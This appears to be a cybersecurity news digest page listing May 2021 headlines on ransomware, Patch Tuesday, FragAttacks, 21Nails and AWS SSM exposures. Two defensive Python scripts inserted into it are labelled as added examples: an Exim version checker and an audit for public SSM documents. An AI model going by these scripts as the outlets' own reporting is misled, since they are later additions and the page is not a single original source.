Abstract President Biden signed an executive order on May 12, 2021, intended to address the country’s cybersecurity issues following the SolarWinds hack. The executive order, divided into 10 sections, includes components that set cybersecurity standards for federal contractors, remove barriers to the sharing of information, modernize federal government cybersecurity and attempt to improve “the integrity of the software supply chain,” among other priorities.

Lawfare

May 13, 2021 – Government

Biden signed executive order to improve the Nation’s Cybersecurity Full Text

Abstract President Joe Biden signed an ambitious executive order to dramatically improve the security of the US government networks. President Biden signed an executive order this week to improve the country's defenses against cyberattacks, it is an important...

Security Affairs

May 13, 2021 – General

Publishing exploits early doesn’t encourage patching or help defense, data shows Full Text

Abstract Despite debate in the threat intel community, a new study finds that publishing exploits before patches are available does more harm than good.

SCMagazine

May 13, 2021 – General

Five Critical Password Security Rules Your Employees Are Ignoring Full Text

Abstract According to Keeper Security’s Workplace Password Malpractice Report, many remote workers aren’t following best practices for password security.

Threatpost

May 13, 2021 – Solution

UK government releases free cyber-threat warning tool at annual CyberUK conference Full Text

Abstract The tool, called Early Warning, is the latest Active Cyber Defence (ACD) service from the NCSC, and was launched on the opening day of the government agency’s annual conference.

The Daily Swig

May 13, 2021 – Covid-19

Dark Web Getting Loaded With Bogus Covid-19 Vaccines and Forged Cards Full Text

Abstract Bogus COVID-19 test results, fraudulent vaccination cards, and questionable vaccines are emerging as a hot commodity on the dark web in what's the latest in a long list of cybercrimes capitalizing on the coronavirus pandemic. "A new and troubling phenomenon is that consumers are buying COVID-19 vaccines on the black market due to the increased demand around the world," said Anne An, a senior security researcher at McAfee's Advanced Programs Group (APG). "As a result, illegal COVID-19 vaccines and vaccination records are in high demand on darknet marketplaces." The growing demand and the race towards achieving herd immunity means at least a dozen underground marketplaces are peddling COVID-19 related merchandise, with Pfizer-BioNTech vaccines purchasable for $500 per dose from top-selling vendors who rely on services like Wickr, Telegram, WhatsApp, and Gmail for advertising and communications. Darknet listings for the supposed vaccines are being sold

The Hacker News

May 13, 2021 – Hacker

Colonial Pipeline Attackers Linked to Infamous REvil Group Full Text

Abstract East coast fuel pipeline slowly resumes operations

Infosecurity Magazine

May 13, 2021 – Government

US CISA and FBI publish joint alert on DarkSide ransomware Full Text

Abstract FBI and DHS's CISA have published a joint alert on DarkSide ransomware activity after the disruptive attack on Colonial Pipeline. FBI and DHS's CISA have published a joint alert to warn of ransomware attacks conducted by the DarkSide group. The alert...

Security Affairs

May 13, 2021 – Business

H&R Block seeks out open-source expertise to stock up on SOC talent Full Text

Abstract Open source experience can help propel professionals’ careers and bring diversity of thought to a security team. SC Media spoke to Carraig Stanwyck, H&R Block’s manager of global security operations, and Bernard Brantley, CISO at Corelight, to hear more.

SCMagazine

May 13, 2021 – Breach

Manchester City Council Exposes Number Plates of Over 60,000 Cars Charged with Parking Tickets Full Text

Abstract Drivers who picked up parking tickets during April-July 2020 had their identities exposed, thanks to the council forgetting to delete the number plates from the uploaded spreadsheets.

The Register

May 13, 2021 – General

Four Years On: Two-thirds of Global Firms Still Exposed to WannaCry Full Text

Abstract ExtraHop finds most enterprises are still running SMBv1, the protocol version WannaCry exploited

Infosecurity Magazine

May 13, 2021 – General

Navigating the waters of maritime cybersecurity Full Text

Abstract Earlier this year, the U.S. government released a first of its kind National Maritime Cyber Security Plan (NMCP), accompanying recent maritime cybersecurity directives from the U.S. Coast Guard.

Help Net Security

May 13, 2021 – Ransomware

Ransomware Attackers Now Using Triple Extortion Tactics Against Victims’ Customers, Partners, and Other Third-Parties Full Text

Abstract In this tactic, the criminals send ransom demands not only to the attacked organization but to any customers, users, or other third parties that would be hurt by the leaked data.

Tech Republic

May 13, 2021 – Government

US President Biden Signs Executive Order to Bolster Federal Government’s Cybersecurity Full Text

Abstract The move is part of a broad effort to strengthen the United States’ defenses by encouraging private companies to practice better cybersecurity or risk being locked out of federal contracts.

New York Times

May 13, 2021 – Hacker

Beyond Lazarus: North Korean cyber-threat groups become top-tier, ‘reckless’ adversaries Full Text

Abstract Over recent years, North Korea has evolved from a nuisance to its neighbor South Korea and purveyor of ransomware and DDoS attacks to become the scourge of banks and cryptocurrency exchanges.

The Daily Swig

May 13, 2021 – General

Over 30,000 VoIP Devices Identifiable Worldwide Full Text

Abstract Researchers identified 38,335 public-facing VoIP/SIP devices worldwide. Aastra-Mitel tops the manufacturer list, the United States leads the list among countries, and London tops the chart for cities.

Cyber News

May 13, 2021 – General

SMBs increasingly face same cyber threats as large enterprises Full Text

Abstract For the first time since the Verizon Data Breach Investigations Report began tracking cyberattack techniques, threat patterns affecting small and medium businesses began to closely align with the patterns affecting large firms.

SCMagazine

May 12, 2021 – Government

Biden issues executive order to increase U.S. cybersecurity defenses Full Text

Abstract President Biden signed an executive order Wednesday to modernize the country's defenses against cyberattacks and give more timely access to information necessary for law enforcement to conduct investigations.

BleepingComputer

May 12, 2021 – Vulnerabilities

Microsoft fixes four critical vulnerabilities that pose risk to both data and infrastructure Full Text

Abstract Products affected by the Microsoft vulnerabilities include Hyper-V, Internet Explorer, Windows Server, and Windows 10.

SCMagazine

May 12, 2021 – Government

Biden signs massive order on cybersecurity Full Text

Abstract Biden signed a long-awaited executive order on cybersecurity, covering everything from federal procurement standards for private sector contractors to IoT security labels.

SCMagazine

May 12, 2021 – Government

Biden signs executive order to improve federal cybersecurity following major hacks Full Text

Abstract President Biden on Wednesday signed an executive order aimed at improving federal cybersecurity, with the order coming on the heels of multiple major and damaging cyberattacks including the one on the Colonial Pipeline.  

The Hill

May 12, 2021 – General

Hillicon Valley: Global cybersecurity leaders say they feel unprepared for attack | Senate Commerce Committee advances Biden’s FTC nominee Lina Khan | Senate panel approves bill that would invest billions in tech Full Text

Abstract Starting out with some good news tonight: Colonial Pipeline is back online after shutting down over a cyberattack last weekend. Meanwhile, a number of global chief information security officers said they think their organizations are unprepared to face a cyberattack, according to a report released Wednesday. The Senate Commerce Committee advanced President Biden’s nominee to the Federal Trade Commission, Lina Khan, and approved legislation that would invest billions in science and emerging technologies in an effort to compete with China.

The Hill

May 12, 2021 – General

How Companies Need to Treat User Data and Manage Their Partners Full Text

Abstract After the introduction of CCPA and GDPR, much more attention is given to third-party risks, and the privacy terms and conditions users agree to. Global privacy regulations, such as the CCPA and GDPR, were enacted to ensure stricter standards...

Security Affairs

May 12, 2021 – Attack

Colonial Pipeline restarting operations after cyberattack Full Text

Abstract Colonial Pipeline announced Wednesday that it has begun a restart of its operations after a cyberattack forced the company to shut down late last week, leading to gas shortages on the East Coast.

The Hill

May 12, 2021 – General

Report finds old misconfiguration woes continue to hammer corporate clouds Full Text

Abstract Misconfigured storage buckets and leaky APIs remain two of the top causes behind cloud breaches.

SCMagazine

May 12, 2021 – Vulnerabilities

Microsoft Patch Tuesday for May 2021 fixes 4 critical flaws Full Text

Abstract Microsoft Patch Tuesday security updates for May 2021 address 55 vulnerabilities, four of which are rated Critical. The updates cover Microsoft Windows, .NET Core and Visual Studio, Internet...

Security Affairs

May 12, 2021 – Phishing

167 counterfeit apps used for financial scams against Android and iOS users Full Text

Abstract Researchers found 167 counterfeit Android and iOS apps that attackers used to steal money from victims who believed they installed a financial trading, banking or cryptocurrency app from a trusted provider.

SCMagazine

May 12, 2021 – General

Energy Sector Witnesses a Rise in Cyberattacks Full Text

Abstract The energy sector worldwide is witnessing increasing cyber risks, with one of the largest fuel pipeline systems in the U.S. now becoming a ransomware attack victim. Such disruptions could lead to devastating outcomes.

Cyware Alerts - Hacker News

May 12, 2021 – Vulnerabilities

Researchers Flag e-Voting Security Flaws Full Text

Abstract Paper ballots and source-code transparency are recommended to improve election security.

Threatpost

May 12, 2021 – Ransomware

Colonial Pipeline has no plans to pay ransom for files: report Full Text

Abstract Colonial Pipeline has no plans to pay the ransom after a cyber attack on their operations, two people familiar with the matter told The Washington Post on Wednesday.

The Hill

May 12, 2021 – Malware

Lemon Duck Cryptominer has Made a Comeback Full Text

Abstract Microsoft Exchange servers are once again under attack by the Lemon Duck cryptocurrency mining botnet, which recently beefed up its anti-detection capabilities. Organizations should stay vigilant against this threat and use reliable anti-malware defenses.

Cyware Alerts - Hacker News

May 12, 2021 – Covid-19

Telegram Fraudsters Ramp Up Forged COVID-19 Vaccine Card Sales Full Text

Abstract A new type of fraud is spiking across the platform: Selling fake vax records to people who want to lie their way into places where proof of vaccine is required.

Threatpost

May 12, 2021 – Government

House lawmakers roll out bill to invest $500 million in state and local cybersecurity Full Text

Abstract A group of bipartisan House lawmakers on Wednesday rolled out legislation that would provide state and local governments with $500 million annually to defend against cyberattacks, which have escalated over the past year during the COVID-19 pandemic. 

The Hill

May 12, 2021 – General

SVR Cyber Operators are Taking Intelligence Advisories Seriously Full Text

Abstract The U.S. security agencies have issued advisories against highly dangerous cyber threats from Russian Foreign Intelligence Service (SVR) operators (APT29, Cozy Bear, and Dukes), and the threat actors are adapting accordingly.

Cyware Alerts - Hacker News

May 12, 2021 – Criminals

Cybercriminals Use Fake Android and iOS Apps Disguised as Trading and Cryptocurrency Apps to Conduct Fraud Full Text

Abstract These fraudulent applications are aimed at exploiting the increased interest in trading apps, driven by the recent significant rise in the value of cryptocurrencies and interest in stock trading.

Sophos

May 12, 2021 – Malware

A Triple Combo of DoubleDrop, DoubleDrag, and DoubleBack Malware Full Text

Abstract Three new malware families, DOUBLEDRAG, DOUBLEDROP, and DOUBLEBACK, associated with a massive cyberespionage campaign, have been targeting several organizations in the U.S. The related phishing attacks were carried out by a new financially motivated threat actor group dubbed UNC2529.

Cyware Alerts - Hacker News

May 12, 2021 – Vulnerabilities

Microsoft fixes WSUS bug blocking May Windows security updates Full Text

Abstract Microsoft has resolved a known issue preventing managed devices from receiving the May 2021 Patch Tuesday security updates.

BleepingComputer

May 12, 2021 – Vulnerabilities

21Nails Exim Bugs and Remote Code Execution: Beware Full Text

Abstract The Qualys Research Team found 10 remotely exploitable and 11 locally exploitable security flaws, collectively known as 21Nails. Versions prior to Exim 4.94.2 are vulnerable to attacks exploiting 21Nails.

Cyware Alerts - Hacker News
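
The quickest fleet-wide triage for the item above is comparing the version each host reports against the fixed release the advisory names. The script below is an added example, not code from the page or from Qualys: it parses the banner that `exim -bV` prints and flags anything below 4.94.2. The sample banners are constructed for the example. One caveat a practitioner needs: distribution packages often backport security fixes while keeping the older version string, so a "vulnerable" verdict here is a prompt to check the package changelog, not proof of exploitability.

```python
"""Added example, not from the original page: flag Exim hosts whose reported
version is below 4.94.2, the release the 21Nails advisory names as fixed."""
import re
import subprocess

FIXED_VERSION = (4, 94, 2)  # first upstream release carrying the 21Nails fixes

# Sample `exim -bV` banners, constructed for this example. The real banner
# starts "Exim version <ver> #<build> built <date>" and continues with a
# copyright line and a list of compiled-in features.
SAMPLE_BANNERS = {
    "old-stable": "Exim version 4.92.3 #3 built 04-Mar-2020 15:45:23\n"
                  "Copyright (c) University of Cambridge, 1995 - 2018\n",
    "unpatched-4.94": "Exim version 4.94 #2 built 02-Jun-2020 09:12:51\n",
    "fixed": "Exim version 4.94.2 #2 built 04-May-2021 18:10:00\n",
    "newer": "Exim version 4.95 #1 built 01-Oct-2021 10:00:00\n",
}

_VERSION_RE = re.compile(r"^Exim version (\d+(?:\.\d+)*)", re.MULTILINE)


def parse_exim_version(banner: str):
    """Return the dotted version from an `exim -bV` banner as a tuple of ints,
    or None when the banner carries no version line."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_pre_fix(version) -> bool:
    """True when the version sorts below 4.94.2. Tuple comparison is
    lexicographic, so (4, 94) < (4, 94, 2) and (4, 95) > (4, 94, 2)."""
    return tuple(version) < FIXED_VERSION


def assess_banner(banner: str) -> str:
    """Classify one banner as 'vulnerable', 'fixed', or 'unknown'.
    'vulnerable' means 'below the upstream fix level'; a backported
    distribution build can still report an older version."""
    v = parse_exim_version(banner)
    if v is None:
        return "unknown"
    return "vulnerable" if is_pre_fix(v) else "fixed"


def assess_local_exim() -> str:
    """Run `exim -bV` on this host and classify it; 'unknown' if exim is absent."""
    try:
        out = subprocess.run(["exim", "-bV"], capture_output=True,
                             text=True, timeout=10).stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return "unknown"
    return assess_banner(out)


if __name__ == "__main__":
    for name, banner in SAMPLE_BANNERS.items():
        print(f"{name:15s} -> {assess_banner(banner)}")
    print(f"{'this host':15s} -> {assess_local_exim()}")
```

Run it with no arguments to see the four constructed banners classified; on a mail host the last line reports the local binary. Feed `assess_banner` the captured output of `ssh host exim -bV` to cover a fleet.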

May 12, 2021 – General

Unstoppable Cyberattacks on Healthcare Facilities Full Text

Abstract While it has been more than a year since the pandemic struck and the world lost more than 3 million lives, threat actors are still hell-bent on disrupting the networks of healthcare facilities, with no concern for human lives.

Cyware Alerts - Hacker News

May 12, 2021 – Ransomware

CISA Analysis on FiveHands Ransomware Full Text

Abstract CISA has published a report on the FiveHands ransomware deployed by an aggressively financially motivated group, UNC2447. The campaign involved extortion incidents between January and February.

Cyware Alerts - Hacker News

May 12, 2021 – Ransomware

A Dive into the Consequences of Ransomware Payoffs Full Text

Abstract While ransomware operators have adopted various extortion tactics to make their victims pay up, it's important to take a look at key statistics on victims paying or not paying the ransom.

Cyware Alerts - Hacker News

May 12, 2021 – Phishing

FBI Warns of Cybercriminals Abusing Search Advertisements to Promote Phishing Sites Full Text

Abstract The FBI says that cybercrime gangs are using search results and search engine ads to lure victims on phishing sites for financial institutions in order to collect their login credentials.

The Record

May 12, 2021 – Business

Microvirtualization at the heart of new HP hardware line Full Text

Abstract The crown jewel security feature is HP’s micro-virtualization and isolation technology, which shifts risky activities into hardware-enforced virtual machines.

SCMagazine

May 12, 2021 – General

Ghostwriter: A Russia-Linked Influence Campaign Full Text

Abstract In July 2020, a cyber-enabled influence campaign, dubbed Ghostwriter, was spotted. It mainly targeted Poland, Lithuania, and Latvia. Based on developments reported by researchers, the campaign has since been attributed to an uncategorized threat actor.

Cyware Alerts - Hacker News

May 12, 2021 – Malware

Microsoft: Threat actors target aviation orgs with new malware Full Text

Abstract Microsoft warns of an ongoing spear-phishing campaign targeting aerospace and travel organizations with multiple remote access trojans (RATs) deployed using a new and stealthy malware loader.

BleepingComputer

May 12, 2021 – Vulnerabilities

‘Frag Attacks’ Vulnerabilities in WiFi Standard Affect WiFi-enabled Devices Dating Back to 1997 Full Text

Abstract A Belgian security researcher has discovered a series of vulnerabilities that impact the WiFi standard, with some bugs dating back as far as 1997 and affecting devices sold for the past 24 years.

The Record

May 12, 2021 – Hacker

Gig Workers Paid $500 for Payroll Passwords Full Text

Abstract Argyle is paying workers to help hack payroll providers, researchers suspect.

Threatpost

May 12, 2021 – Phishing

Trust Wallet, MetaMask crypto wallets targeted by new support scam Full Text

Abstract Trust Wallet and MetaMask wallet users are being targeted in ongoing and aggressive Twitter phishing attacks to steal cryptocurrency funds.

BleepingComputer

May 12, 2021 – Business

Cyber risk management startup VisibleRisk secures $25M Full Text

Abstract The Series A funding round — which comes as VisibleRisk launches a new risk assessment service, Cyber Rating — will be used to expand the company’s workforce well into this year.

Venture Beat

May 12, 2021 – Vulnerabilities

FragAttacks vulnerabilities expose all WiFi devices to hack Full Text

Abstract A security researcher discovered a series of flaws, collectively tracked as FragAttacks, that impact WiFi devices sold over the past 24 years. Belgian security researcher Mathy Vanhoef disclosed the details of multiple vulnerabilities, tracked...

Security Affairs

May 12, 2021 – Government

Wyden pushes for information on federal agencies’ Zoom use, citing security concerns Full Text

Abstract Sen. Ron Wyden (D-Ore.) on Wednesday drilled the General Services Administration (GSA) around its ongoing approval of video conferencing app Zoom for government use, despite security vulnerabilities discovered by researchers in recent years. 

The Hill

May 12, 2021 – Vulnerabilities

SAP Patches High-Severity Flaws in Business One, NetWeaver Products Full Text

Abstract Tech giant SAP has released a total of six new security notes on its May 2021 Security Patch Day, along with updates for five other security notes, including three rated Hot News.

Security Week

May 12, 2021 – Business

Cybersecurity startup Panaseer raises $26.5M Series B led by AllegisCyber Capital Full Text

Abstract Existing investors, including Evolution Equity Partners, Notion Capital, AlbionVC, Cisco Investments and Paladin Capital Group, as well as new investor National Grid Partners, also participated.

TechCrunch

May 12, 2021 – Vulnerabilities

‘FragAttacks’: Wi-Fi Bugs Affect Millions of Devices Full Text

Abstract Wi-Fi devices going back to 1997 are vulnerable to attackers who can steal your data if they’re in range.

Threatpost

May 12, 2021 – Government

South Korea orders urgent review of energy infrastructure cybersecurity Full Text

Abstract Minister of Trade, Industry, and Energy Moon Seung-wook convened a meeting yesterday, saying it was needed considering the attack on Colonial Pipeline, one of the USA’s main oil transport facilities.

The Register

May 12, 2021 – Ransomware

Police Doxxed After Ransom Dispute Full Text

Abstract Washington DC Metropolitan Police records allegedly leaked online during National Policing Week

Infosecurity Magazine

May 12, 2021 – Business

Microsoft’s new project ports Linux eBPF to Windows 10, Server Full Text

Abstract Microsoft has launched a new open-source project that aims to add to Windows the benefits of eBPF, a technology first implemented in Linux that allows attaching programs in both kernel and user applications.

BleepingComputer

May 12, 2021 – General

More Domestic Abuse Cases Involve Tech Full Text

Abstract UK experts report rise in number of domestic abuse cases involving complex use of digital technology

Infosecurity Magazine

May 12, 2021 – Ransomware

Shining a Light on DARKSIDE Ransomware Operations Full Text

Abstract In addition to providing builds of DARKSIDE ransomware, the operators of this service also maintain a blog accessible via Tor. This site is also used to pressure victims into paying ransoms.

FireEye

May 12, 2021 – Privacy

INTERPOL Launches Digital Piracy Project Full Text

Abstract New initiative aims to counter online piracy and dismantle illicit online marketplaces

Infosecurity Magazine

May 12, 2021 – Ransomware

UK’s Computer Misuse Act to be reviewed, says Home Secretary as she condemns ransomware payoffs Full Text

Abstract UK Home Secretary Priti Patel has promised a government review of the UK's 30-year-old Computer Misuse Act "this year" as well as condemning companies that buy off ransomware criminals.

The Register

May 12, 2021 – Government

UK Government Drafts New Legislation to Force Tech Firms to Tackle Online Abuse Full Text

Abstract The bill will cover a range of online harms, including child sexual abuse, harassment, and fraud

Infosecurity Magazine

May 12, 2021 – Business

Apple service provider Jamf buys zero-trust software vendor Wandera for $400 million Full Text

Abstract Apple enterprise support services provider Jamf this afternoon said it will acquire nine-year-old startup Wandera of San Francisco, a provider of cloud-based software for "zero trust" security.

ZDNet

May 12, 2021 – Breach

Companies’ 5 Million Personally Identifiable Information Records Detected on an AWS Service Due to Misconception of Users Full Text

Abstract During this research, CPR detected several SSM documents that led to the discovery of over 5 million Personally identifiable information records and credit card transactions for several companies.

Check Point Research

May 12, 2021 – General

Cyberspace Is Neither Just an Intelligence Contest, nor a Domain of Military Conflict; SolarWinds Shows Us Why It’s Both Full Text

Abstract Future conversation needs to move beyond the military versus intelligence contest binary construct to more meaningfully explore how states may seek to use cyberspace for multiple objectives, either in sequence or in parallel.

Lawfare

May 12, 2021 – Vulnerabilities

Maybe don’t call Saul? Over 30,000 VoIP devices identifiable worldwide, some with suspected vulnerabilities Full Text

Abstract Thousands of public-facing devices can be accessed anywhere in the world, from the US to Russia, from London to Johannesburg. Our research shows that large and small manufacturers are identifiable, with Aastra-Mitel topping the list. As with many...

Security Affairs

May 12, 2021 – Vulnerabilities

All Wi-Fi devices impacted by new FragAttacks vulnerabilities Full Text

Abstract Newly discovered Wi-Fi security vulnerabilities collectively known as FragAttacks (fragmentation and aggregation attacks) are impacting all Wi-Fi devices (including computers, smartphones, and smart devices) going back as far as 1997.

BleepingComputer

May 12, 2021 – Vulnerabilities

Australia: 328 weaknesses found by WA Auditor-General in 50 local government systems Full Text

Abstract The computer systems of 50 Western Australian local government entities were probed and the result was the finding of 328 control weaknesses, with 33 considered as significant by the Auditor-General.

ZDNet

May 12, 2021 – General

Global cybersecurity leaders say they feel unprepared for attack: report Full Text

Abstract A majority of global chief information security officers (CISOs) surveyed as part of a report released Wednesday said they feel their organizations are unprepared to face a cyberattack, despite many believing they will face an attack in the next year.

The Hill

May 12, 2021 – Vulnerabilities

Nearly All Wi-Fi Devices Are Vulnerable to New FragAttacks Full Text

Abstract Three design and multiple implementation flaws have been disclosed in the IEEE 802.11 technical standard that undergirds Wi-Fi, potentially enabling an adversary to take control over a system and plunder confidential data. Called FragAttacks (short for FRagmentation and AGgregation attacks), the weaknesses impact all Wi-Fi security protocols, from Wired Equivalent Privacy (WEP) all the way to Wi-Fi Protected Access 3 (WPA3), thus virtually putting almost every wireless-enabled device at risk of attack. "An adversary that is within radio range of a victim can abuse these vulnerabilities to steal user information or attack devices," Mathy Vanhoef, a security academic at New York University Abu Dhabi, said. "Experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities." IEEE 802.11 provides the basis for all modern devices using the Wi-Fi family of network protocols, allowing lap

The Hacker News

May 12, 2021 – Government

#CYBERUK21: Foreign Secretary Sets Out UK’s Global Cyber Vision Full Text

Abstract Dominic Raab says the UK and its allies must partner with the poorest regions in cyberspace

Infosecurity Magazine

May 12, 2021 – Malware

TeaBot Android banking Trojan targets banks in Europe Full Text

Abstract Malware researchers from Cleafy warn of a new Android banking trojan dubbed TeaBot (aka Anatsa) that is targeting banks in Europe. Malware experts from the Italian cybersecurity firm Cleafy have spotted a new Android banking trojan dubbed TeaBot (aka...

Security Affairs

May 12, 2021 – General

‘Everyone had to rethink security’: What Microsoft learned from a chaotic year Full Text

Abstract Microsoft Corporate Vice President of Security, Compliance and Identity Vasu Jakkal spoke to SC Media about lessons learned from the year that brought COVID and, in particular, the Solarigate/ SUNBURST campaign.

SCMagazine

May 12, 2021 – Malware

TeaBot Trojan Targets Banks via Hijacked Android Handsets Full Text

Abstract Malware first observed in Italy can steal victims’ credentials and SMS messages as well as livestream device screens on demand.

Threatpost

May 12, 2021 – Vulnerabilities

Time to patch against FragAttacks but good luck with home routers and IoT devices Full Text

Abstract Several of the flaws relate to the ability to inject plaintext frames, as well as certain devices accepting any unencrypted frame or plaintext aggregated frames that look like handshake messages.

ZDNet

May 12, 2021 – Vulnerabilities

Latest Microsoft Windows Updates Patch Dozens of Security Flaws Full Text

Abstract Microsoft on Tuesday rolled out its scheduled monthly security update with patches for 55 security flaws affecting Windows, Exchange Server, Internet Explorer, Office, Hyper-V, Visual Studio, and Skype for Business. Of these 55 bugs, four are rated as Critical, 50 are rated as Important, and one is listed as Moderate in severity. Three of the vulnerabilities are publicly known, although, unlike last month, none of them are under active exploitation at the time of release. The most critical of the flaws addressed is CVE-2021-31166, a wormable remote code execution vulnerability in the HTTP protocol stack. The issue, which could allow an unauthenticated attacker to send a specially crafted packet to a targeted server, is rated 9.8 out of a maximum of 10 on the CVSS scale. Another vulnerability of note is a remote code execution flaw in Hyper-V (CVE-2021-28476), which carries the highest CVSS score of any flaw patched this month, 9.9. "This i

The Hacker News

May 12, 2021 – General

Home Working Parents and Young Adults Are Most Risky IT Users Full Text

Abstract HP Inc study warns of blurred lines between work and personal lives

Infosecurity Magazine

May 12, 2021 – 5G

NSA and ODNI analyze potential risks to 5G networks Full Text

Abstract U.S. Intelligence agencies warn of weaknesses in 5G networks that could be exploited by crooks and nation-state actors for intelligence gathering. The U.S. National Security Agency (NSA), along with the DHS Cybersecurity and Infrastructure Security...

Security Affairs

May 12, 2021 – General

Removal of Fraudulent URLs Jumped 15-Fold in 2020, NCSC Says Full Text

Abstract In 2020, the National Cyber Security Centre’s (NCSC) Active Cyber Defence (ACD) programme managed to curb the online scam economy in a record-breaking takedown of 700,595 scams.

Bitdefender

May 12, 2021 – Ransomware

Ransomware Gang Leaks Metropolitan Police Data After Failed Negotiations Full Text

Abstract The cybercrime syndicate behind Babuk ransomware has leaked more personal files belonging to the Metropolitan Police Department (MPD) after negotiations with the DC Police broke down, warning that they intend to publish all data if their ransom demands are not met. "The negotiations reached a dead end, the amount we were offered does not suit us, we are posting 20 more personal files on officers, you can download this archive, the password will be released tomorrow. if during tomorrow they do not raise the price, we will release all the data," the gang said in a statement on their data leak site. "You still have the ability to stop it," it added. The Babuk group is said to have stolen 250GB of data, including investigation reports, arrests, disciplinary actions, and other intelligence briefings. Like other ransomware operations, Babuk adheres to a practice called double extortion, which involves demanding money in return for unlocking files and servers en

The Hacker News

May 12, 2021 – Vulnerabilities

Microsoft Fixes Exchange Server Zero-Day in May Patch Tuesday Full Text

Abstract Bug was first disclosed in Pwn2Own competition last month

Infosecurity Magazine

May 12, 2021 – General

Why threat hunting is obsolete without context Full Text

Abstract Threat hunting is implemented by IT professionals to find dormant or active threats on their network to better understand and harness network visibility and threat actor entry points.

Help Net Security

May 12, 2021 – Vulnerabilities

Half of Government Security Incidents Caused by Missing Patches Full Text

Abstract Risks are driving IT modernization push, according to BAE Systems

Infosecurity Magazine

May 11, 2021 – Vulnerabilities

Alert: Hackers Exploit Adobe Reader 0-Day Vulnerability in the Wild Full Text

Abstract Adobe has released Patch Tuesday updates for the month of May with fixes for multiple vulnerabilities spanning 12 different products, including a zero-day flaw affecting Adobe Reader that's actively exploited in the wild. The list of updated applications includes Adobe Experience Manager, Adobe InDesign, Adobe Illustrator, Adobe InCopy, Adobe Genuine Service, Adobe Acrobat and Reader, Magento, Adobe Creative Cloud Desktop Application, Adobe Media Encoder, Adobe After Effects, Adobe Medium, and Adobe Animate. In a security bulletin, the company acknowledged it received reports that the flaw "has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows." Tracked as CVE-2021-28550, the zero-day concerns an arbitrary code execution flaw that could allow adversaries to execute virtually any command on target systems. While the targeted attacks took aim at Windows users of Adobe Reader, the issue affects both Windows and macOS ver

The Hacker News

May 11, 2021 – Breach

AWS configuration issues lead to exposure of 5 million records Full Text

Abstract Amazon Web Services Systems Manager misconfigurations led to the potential exposure of more than 5 million records containing personally identifiable information and credit card transactions, spread across more than 3,000 SSM documents.

SCMagazine
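
The exposure described in this item and in the Check Point Research entry above comes from SSM documents that their owners shared with the pseudo-account "all", which makes them readable from any AWS account. The script below is an added example, not the page's or Check Point's code: it lists the documents an account owns, flags the ones shared publicly, and reports whether the account-level setting that blocks public sharing is turned on. The API calls (ssm:ListDocuments, ssm:DescribeDocumentPermission, ssm:GetServiceSetting) and the setting ID are real; the client is injected so the logic runs against the constructed fake below without credentials, and a `--live` flag switches to boto3.

```python
"""Added example, not from the original page: find publicly shared SSM
documents in an AWS account and check the public-sharing block setting."""

# Account-level setting; "Disable" blocks public sharing of SSM documents.
PUBLIC_SHARING_SETTING = "/ssm/documents/console/public-sharing-permission"


def list_owned_documents(ssm):
    """Yield names of SSM documents owned by this account, following pagination."""
    token = None
    while True:
        kwargs = {"Filters": [{"Key": "Owner", "Values": ["Self"]}]}
        if token:
            kwargs["NextToken"] = token
        resp = ssm.list_documents(**kwargs)
        for ident in resp.get("DocumentIdentifiers", []):
            yield ident["Name"]
        token = resp.get("NextToken")
        if not token:
            return


def is_public(ssm, name):
    """A document is public when its Share permission lists the account "all"."""
    perm = ssm.describe_document_permission(Name=name, PermissionType="Share")
    return "all" in perm.get("AccountIds", [])


def public_sharing_blocked(ssm):
    """True when the account-level block-public-sharing setting is 'Disable'."""
    setting = ssm.get_service_setting(SettingId=PUBLIC_SHARING_SETTING)
    return setting["ServiceSetting"].get("SettingValue") == "Disable"


def audit(ssm):
    """Return the publicly shared document names and the account setting state."""
    public = [name for name in list_owned_documents(ssm) if is_public(ssm, name)]
    return {"public_documents": public,
            "public_sharing_blocked": public_sharing_blocked(ssm)}


class FakeSSM:
    """Constructed stand-in for boto3's SSM client: two pages of documents,
    one of them shared with "all", and the AWS default setting (Enable)."""

    def __init__(self):
        self._pages = [
            {"DocumentIdentifiers": [{"Name": "Deploy-Prod"}, {"Name": "RotateKeys"}],
             "NextToken": "p2"},
            {"DocumentIdentifiers": [{"Name": "Shared-Helper"}]},
        ]
        self._perms = {
            "Deploy-Prod": ["123456789012"],  # shared with one named account
            "RotateKeys": [],
            "Shared-Helper": ["all"],         # publicly shared: the finding
        }
        self._setting = "Enable"

    def list_documents(self, Filters=None, NextToken=None):
        return self._pages[1] if NextToken == "p2" else self._pages[0]

    def describe_document_permission(self, Name, PermissionType):
        return {"AccountIds": list(self._perms[Name])}

    def get_service_setting(self, SettingId):
        return {"ServiceSetting": {"SettingId": SettingId,
                                   "SettingValue": self._setting}}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1 and sys.argv[1] == "--live":
        import boto3  # only needed against a real account
        client = boto3.client("ssm")
    else:
        client = FakeSSM()
    result = audit(client)
    print(result)
    if result["public_documents"] and not result["public_sharing_blocked"]:
        print("Remediate: aws ssm modify-document-permission --name <doc> "
              "--permission-type Share --account-ids-to-remove all, then "
              f"aws ssm update-service-setting --setting-id {PUBLIC_SHARING_SETTING} "
              "--setting-value Disable")
```

Run against the fake it reports `Shared-Helper` as public with the block setting off; with `--live` it needs read permissions on SSM documents and service settings in the calling account, and the setting is per region, so repeat per region you use.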

May 11, 2021 – General

Hillicon Valley: Feds eye more oversight of pipelines after Colonial attack | White House monitoring fuel shortages | Democrats urge Facebook to reverse WhatsApp update | Biden announces deal with Uber, Lyft for free vaccine rides Full Text

Abstract The impact of the ransomware attack on Colonial Pipeline continued to make waves Tuesday, with the Biden administration and members of Congress weighing further oversight of the oil and gas sector, and officials scrambling to respond to oil shortages in portions of the country. Meanwhile, members of the Congressional Hispanic Caucus urged Facebook to reverse a privacy update for WhatsApp, and President Biden announced a partnership with Uber and Lyft to provide free rides for Americans to get COVID-19 vaccines.

The Hill

May 11, 2021 – Vulnerabilities

Hackers target Windows users exploiting a Zero-Day in Reader Full Text

Abstract Adobe confirmed that a zero-day vulnerability affecting Adobe Reader for Windows has been exploited in the wild in limited attacks. Adobe security updates for May 2021 address at least 43 CVEs in Experience Manager, InDesign, Illustrator, InCopy,...

Security Affairs

May 11, 2021 – Government

Feds eye more oversight of pipelines after Colonial attack Full Text

Abstract The Biden administration and Capitol Hill are taking a closer look at the security in place for critical oil and gas utilities following the Colonial Pipeline shutdown.

